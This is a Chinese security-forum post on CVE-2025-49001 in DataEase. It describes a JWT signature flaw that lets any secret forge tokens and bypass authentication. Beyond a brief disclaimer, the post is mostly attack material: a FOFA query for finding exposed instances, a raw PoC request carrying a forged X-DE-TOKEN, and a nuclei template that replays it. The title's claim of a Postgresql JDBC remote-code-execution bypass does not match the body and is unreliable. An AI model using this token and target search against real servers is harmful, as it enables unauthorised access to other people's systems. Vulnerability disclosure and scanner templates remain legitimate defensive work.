飞致云 DataEase Postgresql JDBC Bypass 远程代码执行漏洞-网络安全论坛-网络安全-阻击者联盟

飞致云 DataEase Postgresql JDBC Bypass 远程代码执行漏洞

免责声明

       请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述:

DataEase是一款开源的商业智能和数据可视化工具。CVE-2025-49001 中,由于JWT算法实现存在缺陷,导致攻击者可以使用任何secret来伪造JWT令牌,从而绕过权限校验调用后台相关功能接口,甚至造成代码执行。

影响版本:

version < 2.10.10

FOFA:

body="/js/index-0.0.0-dataease.js" || body="/assets/css/style-0.0.0-dataease.css"

POC:

GET /de2api/user/info HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: close
Host: xx.x.xx.xx
out_auth_platform: default
X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8

通过调用/de2api/user/info接口获取用户信息

nuclei 模板:

id: cve-2025-49001

info:
  name: Dataease JWT Authentication Bypass
  author: ProjectDiscoveryAI
  severity: medium
  description: |
    This template checks for the Dataease JWT Authentication Bypass vulnerability (CVE-2025-49001).
    Exploitation involves sending a crafted JWT token to bypass authentication.
  tags: jwt,auth-bypass,cve

http:
  - raw:
      - |
        GET /de2api/user/info HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
        Accept-Encoding: gzip, deflate
        Accept: application/json, text/plain, */*
        Connection: close
        out_auth_platform: default
        X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "\"uid\":1"
          - "\"oid\":1"
        part: body

 

请登录后发表评论

    没有回复内容